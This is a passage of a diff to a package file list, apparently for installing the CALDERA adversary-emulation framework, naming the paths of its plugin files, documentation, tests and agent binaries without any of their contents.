+%%WWWDIR%%/plugins/emu/data/.gitkeep +%%WWWDIR%%/plugins/emu/download_payloads.sh +%%WWWDIR%%/plugins/emu/hook.py +%%WWWDIR%%/plugins/emu/payloads/.gitkeep +%%WWWDIR%%/plugins/emu/templates/emu.html +%%WWWDIR%%/plugins/emu/tests/.gitkeep +%%WWWDIR%%/plugins/emu/tests/test_emu_svc.py +%%WWWDIR%%/plugins/emu/tests/test_group_filtered_planner.py +%%WWWDIR%%/plugins/emu/tests/test_vssadmin_shadow_parser.py +%%WWWDIR%%/plugins/emu/tox.ini +%%WWWDIR%%/plugins/fieldmanual/.github/ISSUE_TEMPLATE/bug_report.md 
+%%WWWDIR%%/plugins/fieldmanual/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/fieldmanual/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/fieldmanual/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/fieldmanual/.github/pull_request_template.md +%%WWWDIR%%/plugins/fieldmanual/.gitignore +%%WWWDIR%%/plugins/fieldmanual/README.md +%%WWWDIR%%/plugins/fieldmanual/VERSION.txt +%%WWWDIR%%/plugins/fieldmanual/hook.py +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Basic-Usage.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/C2-Tunneling.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Dynamically-Compiled-Payloads.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Exfiltration.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Getting-started.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/How-to-Build-Agents.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/How-to-Build-Planners.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/How-to-Build-Plugins.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Initial-Access-Attacks.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Installing-CALDERA.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Lateral-Movement-Guide.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Learning-the-terminology.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Makefile +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Objectives.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Operation-Results.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Parsers.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Plugin-library.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Relationships.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Requirements.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Sandcat-Peer-to-Peer.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Server-Configuration.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/The-REST-API.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Troubleshooting.md +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/Uninstalling-CALDERA.md 
+%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/_static/lm_guide.mp4 +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/conf.py +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/img/debrief_attack_path.png +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/img/fact_relationships.png +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/img/privileged_persistence_state_machine.png +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/index.rst.j2 +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/make.bat +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/plugins/.gitkeep +%%WWWDIR%%/plugins/fieldmanual/sphinx-docs/resources.rst +%%WWWDIR%%/plugins/fieldmanual/static/opener.html +%%WWWDIR%%/plugins/fieldmanual/utils/ability_csv.py +%%WWWDIR%%/plugins/fieldmanual/utils/plugin_docs.py +%%WWWDIR%%/plugins/gameboard/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/gameboard/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/gameboard/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/gameboard/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/gameboard/.github/pull_request_template.md +%%WWWDIR%%/plugins/gameboard/.github/workflows/stale.yml +%%WWWDIR%%/plugins/gameboard/.gitignore +%%WWWDIR%%/plugins/gameboard/README.md +%%WWWDIR%%/plugins/gameboard/VERSION.txt +%%WWWDIR%%/plugins/gameboard/app/gameboard_api.py +%%WWWDIR%%/plugins/gameboard/app/gameboard_svc.py +%%WWWDIR%%/plugins/gameboard/conf/gameboard.yml +%%WWWDIR%%/plugins/gameboard/data/abilities/verification/0df4d46e-e202-4b29-9a19-c2540982002d.yml +%%WWWDIR%%/plugins/gameboard/data/abilities/verification/4a9b51ba-1a0d-4128-a040-5535fd147dc3.yml +%%WWWDIR%%/plugins/gameboard/data/adversaries/7d1794bb-d7ce-4fe8-bae0-6959fa0a0a48.yml +%%WWWDIR%%/plugins/gameboard/hook.py +%%WWWDIR%%/plugins/gameboard/templates/gameboard.html +%%WWWDIR%%/plugins/human/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/human/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/human/.github/ISSUE_TEMPLATE/feature_request.md 
+%%WWWDIR%%/plugins/human/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/human/.github/pull_request_template.md +%%WWWDIR%%/plugins/human/.gitignore +%%WWWDIR%%/plugins/human/README.md +%%WWWDIR%%/plugins/human/VERSION.txt +%%WWWDIR%%/plugins/human/app/c_human.py +%%WWWDIR%%/plugins/human/app/c_workflow.py +%%WWWDIR%%/plugins/human/app/human_api.py +%%WWWDIR%%/plugins/human/app/human_svc.py +%%WWWDIR%%/plugins/human/hook.py +%%WWWDIR%%/plugins/human/payloads/.gitkeep +%%WWWDIR%%/plugins/human/pyhuman/__init__.py +%%WWWDIR%%/plugins/human/pyhuman/app/utility/base_driver.py +%%WWWDIR%%/plugins/human/pyhuman/app/utility/base_workflow.py +%%WWWDIR%%/plugins/human/pyhuman/app/utility/webdriver_helper.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/browse_web.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/browse_youtube.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/download_files.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/execute_command.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/google_search.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/ms_paint.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/open_office_calc.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/open_office_writer.py +%%WWWDIR%%/plugins/human/pyhuman/app/workflows/spawn_shell.py +%%WWWDIR%%/plugins/human/pyhuman/data/browse_youtube.txt +%%WWWDIR%%/plugins/human/pyhuman/data/google_searches.txt +%%WWWDIR%%/plugins/human/pyhuman/data/websites.txt +%%WWWDIR%%/plugins/human/pyhuman/human.py +%%WWWDIR%%/plugins/human/pyhuman/requirements.txt +%%WWWDIR%%/plugins/human/requirements.txt +%%WWWDIR%%/plugins/human/static/css/human.css +%%WWWDIR%%/plugins/human/templates/human.html +%%WWWDIR%%/plugins/manx/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/manx/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/manx/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/manx/.github/ISSUE_TEMPLATE/question.md 
+%%WWWDIR%%/plugins/manx/.github/pull_request_template.md +%%WWWDIR%%/plugins/manx/.gitignore +%%WWWDIR%%/plugins/manx/README.md +%%WWWDIR%%/plugins/manx/VERSION.txt +%%WWWDIR%%/plugins/manx/app/c_session.py +%%WWWDIR%%/plugins/manx/app/h_terminal.py +%%WWWDIR%%/plugins/manx/app/term_api.py +%%WWWDIR%%/plugins/manx/app/term_svc.py +%%WWWDIR%%/plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml +%%WWWDIR%%/plugins/manx/data/adversaries/56aebecf-abca-40c1-ad24-658e7c25b55b.yml +%%WWWDIR%%/plugins/manx/hook.py +%%WWWDIR%%/plugins/manx/payloads/manx.go-darwin +%%WWWDIR%%/plugins/manx/payloads/manx.go-linux +%%WWWDIR%%/plugins/manx/payloads/manx.go-windows +%%WWWDIR%%/plugins/manx/shells/commands/commands.go +%%WWWDIR%%/plugins/manx/shells/commands/payloads.go +%%WWWDIR%%/plugins/manx/shells/go.mod +%%WWWDIR%%/plugins/manx/shells/manx.go +%%WWWDIR%%/plugins/manx/shells/output/output.go +%%WWWDIR%%/plugins/manx/shells/sockets/contact.go +%%WWWDIR%%/plugins/manx/shells/sockets/rawtcp.go +%%WWWDIR%%/plugins/manx/shells/sockets/rawudp.go +%%WWWDIR%%/plugins/manx/shells/util/executors.go +%%WWWDIR%%/plugins/manx/static/css/basic.css +%%WWWDIR%%/plugins/manx/static/css/xterm.css +%%WWWDIR%%/plugins/manx/static/img/manx.png +%%WWWDIR%%/plugins/manx/static/js/terminal.js +%%WWWDIR%%/plugins/manx/static/js/xterm-addon-fit.min.js +%%WWWDIR%%/plugins/manx/static/js/xterm.js +%%WWWDIR%%/plugins/manx/templates/manx.html +%%WWWDIR%%/plugins/manx/update-shells.sh +%%WWWDIR%%/plugins/mock/.flake8 +%%WWWDIR%%/plugins/mock/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/mock/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/mock/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/mock/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/mock/.github/pull_request_template.md +%%WWWDIR%%/plugins/mock/.gitignore +%%WWWDIR%%/plugins/mock/README.md +%%WWWDIR%%/plugins/mock/VERSION.txt +%%WWWDIR%%/plugins/mock/app/mock_gui_api.py 
+%%WWWDIR%%/plugins/mock/app/result_generator.py +%%WWWDIR%%/plugins/mock/app/simulation_svc.py +%%WWWDIR%%/plugins/mock/conf/agents.yml +%%WWWDIR%%/plugins/mock/conf/scenarios/alice.yml +%%WWWDIR%%/plugins/mock/conf/scenarios/hypervisor.yml +%%WWWDIR%%/plugins/mock/hook.py +%%WWWDIR%%/plugins/mock/templates/mock.html +%%WWWDIR%%/plugins/response/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/response/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/response/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/response/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/response/.github/pull_request_template.md +%%WWWDIR%%/plugins/response/.gitignore +%%WWWDIR%%/plugins/response/README.md +%%WWWDIR%%/plugins/response/VERSION.txt +%%WWWDIR%%/plugins/response/app/c_processnode.py +%%WWWDIR%%/plugins/response/app/c_processtree.py +%%WWWDIR%%/plugins/response/app/parsers/basic_strip.py +%%WWWDIR%%/plugins/response/app/parsers/childprocess.py +%%WWWDIR%%/plugins/response/app/parsers/ecs_sysmon.py +%%WWWDIR%%/plugins/response/app/parsers/key_value.py +%%WWWDIR%%/plugins/response/app/parsers/ports.py +%%WWWDIR%%/plugins/response/app/parsers/process.py +%%WWWDIR%%/plugins/response/app/parsers/processguids.py +%%WWWDIR%%/plugins/response/app/parsers/sysmon.py +%%WWWDIR%%/plugins/response/app/requirements/base_requirement.py +%%WWWDIR%%/plugins/response/app/requirements/basic.py +%%WWWDIR%%/plugins/response/app/requirements/has_property.py +%%WWWDIR%%/plugins/response/app/requirements/source_fact.py +%%WWWDIR%%/plugins/response/app/response_svc.py +%%WWWDIR%%/plugins/response/conf/response.yml +%%WWWDIR%%/plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/1b4aa8d5-ba97-4b9b-92a3-eaaaffbfdf0a.yml 
+%%WWWDIR%%/plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/77272c88-ccf5-4225-a3d9-f9e171d1ca5b.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/8bc73098-54d1-4f69-abd5-271e3e2da5df.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml +%%WWWDIR%%/plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml +%%WWWDIR%%/plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml +%%WWWDIR%%/plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml +%%WWWDIR%%/plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml +%%WWWDIR%%/plugins/response/data/abilities/hunt/f9b3eff0-e11c-48de-9338-1578b351b14b.yml +%%WWWDIR%%/plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml +%%WWWDIR%%/plugins/response/data/abilities/response/0fccf23f-6b1a-4ef3-8c89-e8bf27a1858f.yml +%%WWWDIR%%/plugins/response/data/abilities/response/13d0d9cf-e31a-47b6-9217-f38e3f7c25ef.yml +%%WWWDIR%%/plugins/response/data/abilities/response/2331077e-7be9-4e89-b2bb-32e8d7f6a708.yml +%%WWWDIR%%/plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml +%%WWWDIR%%/plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml +%%WWWDIR%%/plugins/response/data/abilities/response/4744d99f-5fea-42a8-8ec4-c228db57caea.yml +%%WWWDIR%%/plugins/response/data/abilities/response/5ec7ae3b-c909-41bb-9b6b-dadec409cd40.yml +%%WWWDIR%%/plugins/response/data/abilities/response/90418255-b202-4fc3-b0ea-b105bff39ca5.yml +%%WWWDIR%%/plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml +%%WWWDIR%%/plugins/response/data/abilities/response/cb85039a-6196-4262-883b-0beeb804b83d.yml 
+%%WWWDIR%%/plugins/response/data/abilities/response/debd322d-2100-45f7-8832-29ef7c56786d.yml +%%WWWDIR%%/plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml +%%WWWDIR%%/plugins/response/data/abilities/response/f5fb8bce-4a79-466a-8187-ed0cd8e8dbe1.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/83d7cf63-e10a-4615-a92e-dce257bf3b9d.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/90a67a85-e81c-4525-8bae-12a2c5787d9a.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/a65a62e1-b8c0-4f88-b564-166e7499d560.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml +%%WWWDIR%%/plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml +%%WWWDIR%%/plugins/response/data/adversaries/169cdc73-8fea-49cf-9021-d0b3c24e2b17.yml +%%WWWDIR%%/plugins/response/data/adversaries/7e422753-ad7a-4401-bc8b-b12a28e69c25.yml +%%WWWDIR%%/plugins/response/data/adversaries/D21B9E7F-CFF5-4030-AD28-388085F8A815.yml +%%WWWDIR%%/plugins/response/data/adversaries/f61e3fc0-43d8-4b36-b5d3-710610b92974.yml +%%WWWDIR%%/plugins/response/data/sources/e1ceccf2-92b3-4a28-ade5-5f67a2dfd7e7.yml +%%WWWDIR%%/plugins/response/hook.py +%%WWWDIR%%/plugins/response/payloads/elasticat.py +%%WWWDIR%%/plugins/response/templates/response.html +%%WWWDIR%%/plugins/sandcat/.flake8 +%%WWWDIR%%/plugins/sandcat/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/sandcat/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/sandcat/.github/ISSUE_TEMPLATE/feature_request.md 
+%%WWWDIR%%/plugins/sandcat/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/sandcat/.github/pull_request_template.md +%%WWWDIR%%/plugins/sandcat/.github/workflows/go.yml +%%WWWDIR%%/plugins/sandcat/.github/workflows/sandcatextensions.yml +%%WWWDIR%%/plugins/sandcat/.gitignore +%%WWWDIR%%/plugins/sandcat/LICENSE +%%WWWDIR%%/plugins/sandcat/README.md +%%WWWDIR%%/plugins/sandcat/VERSION.txt +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/.gitkeep +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/dns_tunneling.py +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/ftp.py +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/gist.py +%%WWWDIR%%/plugins/sandcat/app/extensions/contact/slack.py +%%WWWDIR%%/plugins/sandcat/app/extensions/donut/donut.py +%%WWWDIR%%/plugins/sandcat/app/extensions/execute/native/native.py +%%WWWDIR%%/plugins/sandcat/app/extensions/execute/native/native_aws.py +%%WWWDIR%%/plugins/sandcat/app/extensions/execute/shellcode/shellcode.py +%%WWWDIR%%/plugins/sandcat/app/extensions/execute/shells/shells.py +%%WWWDIR%%/plugins/sandcat/app/extensions/proxy/proxy_http.py +%%WWWDIR%%/plugins/sandcat/app/extensions/proxy/proxy_smb_pipe.py +%%WWWDIR%%/plugins/sandcat/app/extensions/shared/shared.py +%%WWWDIR%%/plugins/sandcat/app/sand_gui_api.py +%%WWWDIR%%/plugins/sandcat/app/sand_svc.py +%%WWWDIR%%/plugins/sandcat/app/utility/base_extension.py +%%WWWDIR%%/plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml +%%WWWDIR%%/plugins/sandcat/docs/Sandcat-Details.md +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/.gitkeep +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/dns_tunneling.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/ftp.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/gist.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/slack.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/contact/util.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/donut/dll_windows.go 
+%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/donut/donut.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/donut/donut_helper_windows.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/donut/donut_windows.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/aws/s3upload.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/aws/s3upload_test.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/ls.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/pwd.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/read_file.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/system_info.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/system_info_nix.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/discovery/system_info_windows.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/native.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/testutil/testutil.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/util/util.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/native/util/util_test.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shellcode/shellcode.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shellcode/shellcode_linux.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shellcode/shellcode_windows.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shells/osascript.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shells/powershell_core.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/execute/shells/python.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/proxy/proxy_receiver_http.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/proxy/proxy_smb_pipe.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/proxy/proxy_smb_pipe_util.go +%%WWWDIR%%/plugins/sandcat/gocat-extensions/shared/shared.go +%%WWWDIR%%/plugins/sandcat/gocat/agent/agent.go 
+%%WWWDIR%%/plugins/sandcat/gocat/agent/agent_factory.go +%%WWWDIR%%/plugins/sandcat/gocat/agent/agent_proxy.go +%%WWWDIR%%/plugins/sandcat/gocat/agent/agent_tunnel.go +%%WWWDIR%%/plugins/sandcat/gocat/agent/agent_util.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/api.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/contact.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/contact_test.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/ssh_tunnel.go +%%WWWDIR%%/plugins/sandcat/gocat/contact/tunnel.go +%%WWWDIR%%/plugins/sandcat/gocat/core/core.go +%%WWWDIR%%/plugins/sandcat/gocat/encoders/base64.go +%%WWWDIR%%/plugins/sandcat/gocat/encoders/encoder.go +%%WWWDIR%%/plugins/sandcat/gocat/encoders/plaintext.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/donut/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/execute.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/native/aws/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/native/discovery/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/native/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/native/util/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shellcode/load.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/cmd.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/powershell.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/proc.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/proc_test.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/shell.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/shells_config.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/shells_config_windows.go +%%WWWDIR%%/plugins/sandcat/gocat/execute/shells/shells_shared.go +%%WWWDIR%%/plugins/sandcat/gocat/go.mod +%%WWWDIR%%/plugins/sandcat/gocat/go.sum +%%WWWDIR%%/plugins/sandcat/gocat/output/output.go +%%WWWDIR%%/plugins/sandcat/gocat/payload/disk.go +%%WWWDIR%%/plugins/sandcat/gocat/payload/disk_test.go +%%WWWDIR%%/plugins/sandcat/gocat/privdetect/privilegedetect.go +%%WWWDIR%%/plugins/sandcat/gocat/privdetect/privilegedetect_windows.go 
+%%WWWDIR%%/plugins/sandcat/gocat/proxy/proxy.go +%%WWWDIR%%/plugins/sandcat/gocat/proxy/proxy_util.go +%%WWWDIR%%/plugins/sandcat/gocat/sandcat.go +%%WWWDIR%%/plugins/sandcat/hook.py +%%WWWDIR%%/plugins/sandcat/payloads/sandcat-elfload.pl.1 +%%WWWDIR%%/plugins/sandcat/payloads/sandcat-elfload.pl.2 +%%WWWDIR%%/plugins/sandcat/payloads/sandcat-elfload.py +%%WWWDIR%%/plugins/sandcat/payloads/sandcat-inmem.sh +%%WWWDIR%%/plugins/sandcat/payloads/sandcat.go-darwin +%%WWWDIR%%/plugins/sandcat/payloads/sandcat.go-linux +%%WWWDIR%%/plugins/sandcat/payloads/sandcat.go-windows +%%WWWDIR%%/plugins/sandcat/static/img/cat.jpg +%%WWWDIR%%/plugins/sandcat/templates/sandcat.html +%%WWWDIR%%/plugins/sandcat/update-agents.sh +%%WWWDIR%%/plugins/ssl/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/ssl/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/ssl/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/ssl/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/ssl/.github/pull_request_template.md +%%WWWDIR%%/plugins/ssl/.gitignore +%%WWWDIR%%/plugins/ssl/README.md +%%WWWDIR%%/plugins/ssl/VERSION.txt +%%WWWDIR%%/plugins/ssl/app/ssl_gui_api.py +%%WWWDIR%%/plugins/ssl/conf/insecure_certificate.pem +%%WWWDIR%%/plugins/ssl/hook.py +%%WWWDIR%%/plugins/ssl/templates/haproxy.conf +%%WWWDIR%%/plugins/ssl/templates/ssl.html +%%WWWDIR%%/plugins/stockpile/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/stockpile/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/stockpile/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/stockpile/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/stockpile/.github/pull_request_template.md +%%WWWDIR%%/plugins/stockpile/.gitignore +%%WWWDIR%%/plugins/stockpile/LICENSE +%%WWWDIR%%/plugins/stockpile/README.md +%%WWWDIR%%/plugins/stockpile/VERSION.txt +%%WWWDIR%%/plugins/stockpile/app/atomic.py +%%WWWDIR%%/plugins/stockpile/app/batch.py +%%WWWDIR%%/plugins/stockpile/app/buckets.py 
+%%WWWDIR%%/plugins/stockpile/app/donut.py +%%WWWDIR%%/plugins/stockpile/app/guided.py +%%WWWDIR%%/plugins/stockpile/app/look_ahead.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/base64_basic.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/base64_jumble.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/base64_no_padding.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/caesar_cipher.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/plain_text.py +%%WWWDIR%%/plugins/stockpile/app/obfuscators/steganography.py +%%WWWDIR%%/plugins/stockpile/app/packers/gohide.py +%%WWWDIR%%/plugins/stockpile/app/packers/upx.py +%%WWWDIR%%/plugins/stockpile/app/parsers/54ndc47_remote_copy.py +%%WWWDIR%%/plugins/stockpile/app/parsers/acrn.py +%%WWWDIR%%/plugins/stockpile/app/parsers/antivirus.py +%%WWWDIR%%/plugins/stockpile/app/parsers/basic.py +%%WWWDIR%%/plugins/stockpile/app/parsers/bookmarks.py +%%WWWDIR%%/plugins/stockpile/app/parsers/broadcastip.py +%%WWWDIR%%/plugins/stockpile/app/parsers/filename.py +%%WWWDIR%%/plugins/stockpile/app/parsers/firewallping.py +%%WWWDIR%%/plugins/stockpile/app/parsers/gdomain.py +%%WWWDIR%%/plugins/stockpile/app/parsers/ipaddr.py +%%WWWDIR%%/plugins/stockpile/app/parsers/json.py +%%WWWDIR%%/plugins/stockpile/app/parsers/katz.py +%%WWWDIR%%/plugins/stockpile/app/parsers/nbtstat.py +%%WWWDIR%%/plugins/stockpile/app/parsers/net_view.py +%%WWWDIR%%/plugins/stockpile/app/parsers/netlocalgroup.py +%%WWWDIR%%/plugins/stockpile/app/parsers/nmap.py +%%WWWDIR%%/plugins/stockpile/app/parsers/printer_queue.py +%%WWWDIR%%/plugins/stockpile/app/parsers/reverse_nslookup.py +%%WWWDIR%%/plugins/stockpile/app/parsers/scan.py +%%WWWDIR%%/plugins/stockpile/app/parsers/share_mounted.py +%%WWWDIR%%/plugins/stockpile/app/parsers/ssh.py +%%WWWDIR%%/plugins/stockpile/app/parsers/wifipref.py +%%WWWDIR%%/plugins/stockpile/app/requirements/base_requirement.py +%%WWWDIR%%/plugins/stockpile/app/requirements/basic.py 
